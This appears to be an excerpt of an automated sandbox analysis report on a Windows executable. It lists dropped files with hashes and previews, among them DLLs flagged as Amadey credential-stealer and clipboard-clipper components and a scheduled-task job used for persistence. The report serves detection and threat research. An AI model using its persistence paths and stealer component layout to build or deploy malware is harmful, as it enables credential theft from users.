                                                                                            Preview:AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

                                                                                            C:\Users\user\AppData\Local\Temp\_Files_\DTBZGIOOSO.docx

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\rundll32.exe
                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1026
                                                                                            Entropy (8bit):4.705615236042988
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                            MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                            SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                            SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                            SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                            Malicious:false
                                                                                            Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

                                                                                            C:\Users\user\AppData\Local\Temp\_Files_\KATAXZVCPS.xlsx

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\rundll32.exe
                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1026
                                                                                            Entropy (8bit):4.699548026888946
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                            MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                            SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                            SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                            SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                            Malicious:false
                                                                                            Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                                            C:\Users\user\AppData\Local\Temp\_Files_\NHPKIZUUSG.docx

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\rundll32.exe
                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1026
                                                                                            Entropy (8bit):4.70435191336402
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
                                                                                            MD5:8C1F71001ABC7FCE68B3F15299553CE7
                                                                                            SHA1:382285FB69081EB79C936BC4E1BFFC9D4697D881
                                                                                            SHA-256:DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
                                                                                            SHA-512:8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
                                                                                            Malicious:false
                                                                                            Preview:NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE

                                                                                            C:\Users\user\AppData\Local\Temp\_Files_\VLZDGUKUTZ.xlsx

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\rundll32.exe
                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1026
                                                                                            Entropy (8bit):4.701757898321461
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                            Malicious:false
                                                                                            Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                                            C:\Users\user\AppData\Local\Temp\_Files_\XZXHAVGRAG.docx

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\rundll32.exe
                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1026
                                                                                            Entropy (8bit):4.69156792375111
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                            MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                            SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                            SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                            SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                            Malicious:false
                                                                                            Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                            C:\Users\user\AppData\Local\Temp\_Files_\XZXHAVGRAG.xlsx

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\rundll32.exe
                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1026
                                                                                            Entropy (8bit):4.69156792375111
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                            MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                            SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                            SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                            SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                            Malicious:false
                                                                                            Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3xnwzpq5.2iu.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cipsawgy.e15.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_renydpxy.mj4.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vmy1tnrq.lsz.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):112128
                                                                                            Entropy (8bit):6.380855494726669
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:xE5kJp+s5aP40bGsuZR+SVhJQ3ICRv4l:m5ka2obfuZR7Py4l
                                                                                            MD5:2AFDBE3B99A4736083066A13E4B5D11A
                                                                                            SHA1:4D4856CF02B3123AC16E63D4A448CDBCB1633546
                                                                                            SHA-256:8D31B39170909595B518B1A03E9EC950540FABD545ED14817CAC5C84B91599EE
                                                                                            SHA-512:D89B3C46854153E60E3FA825B394344EEE33936D7DBF186AF9D95C9ADAE54428609E3BF21A18D38FCE3D96F3E0B8E4E0ED25CB5004FBE288DE3AEF3A85B1D93F
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.j.c.j.c.j.8.i.i.j.8.o..j.8.n.q.j..n.l.j..i.r.j..o.B.j.8.k.d.j.c.k...j...c.`.j...j.b.j.....b.j...h.b.j.Richc.j.........................PE..L......e...........!.....$..........Lf.......@............................................@......................... ...........P.......................................8...........................(...@............@..L............................text....".......$.................. ..`.rdata..4h...@...j...(..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1285632
                                                                                            Entropy (8bit):6.460516510065148
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:ZvkQL6YY4wMPSYZofkf0Gh6Pi41+a9uyP5dgg/l+yC7:ZsMPSYcS5wPi095PbgWl
                                                                                            MD5:92FBDFCCF6A63ACEF2743631D16652A7
                                                                                            SHA1:971968B1378DD89D59D7F84BF92F16FC68664506
                                                                                            SHA-256:B4588FEACC183CD5A089F9BB950827B75DF04BD5A6E67C95FF258E4A34AA0D72
                                                                                            SHA-512:B8EA216D4A59D8858FD4128ABB555F8DCF3ACCA9138E663B488F09DC5200DB6DC11ECC235A355E801145BBBB44D7BEAC6147949D75D78B32FE9CFD2FA200D117
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............^...^...^.._...^.._...^.._2..^W._..^W._...^W._...^.._...^...^C..^.._...^.._...^..X^...^.._...^Rich...^........................PE..d......e.........." .........R......h........................................P............`......................................... ...X...x........ .......`..(............0..........p........................... ................................................text............................... ..`.rdata..............................@..@.data...L........D..................@....pdata..(....`......................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................

                                                                                            C:\Windows\Tasks\explorgu.job

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\wIaKimJFke.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):288
                                                                                            Entropy (8bit):3.3820717079781306
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:b8z9X4RKUEZ+lX1yrlbtPjgsW2YRZuy0lphwldt0:Izp4RKQ1yrrjzvYRQVpWzt0
                                                                                            MD5:553B3F36277BCABA37BEC01535475B4C
                                                                                            SHA1:56D89F20004C061C804431F72DDDF6C8DC5E5C9A
                                                                                            SHA-256:0BBC66D6EFB396D0B0E2B6D00A863E86FB2BDA4861D8FE7126AFF7044D4505A5
                                                                                            SHA-512:50039FF9BDAE836F964D6F4AD509DB709EAA7ADE7BFF17A33CD0B146FF8903D95BCA15BC435BFAAE2B6CCA1F2C3BC61EB6C4F54AE4FE971A7A3DFF8EFCE5884C
                                                                                            Malicious:false
                                                                                            Preview:....E.(9...J.9.sq..hF.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.0.c.0.7.2.6.0.d.c.\.e.x.p.l.o.r.g.u...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.949205320985039
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:wIaKimJFke.exe
                                                                                            File size:1'906'688 bytes
                                                                                            MD5:79fbd35cae4148d9053cd4590b6d41c0
                                                                                            SHA1:3548d8fa1f242206447224068c16ffd30278ede3
                                                                                            SHA256:9c1751ba73fe53ed9385f24750212c6e785843e4c63dbafec8f95d3e6a5088ef
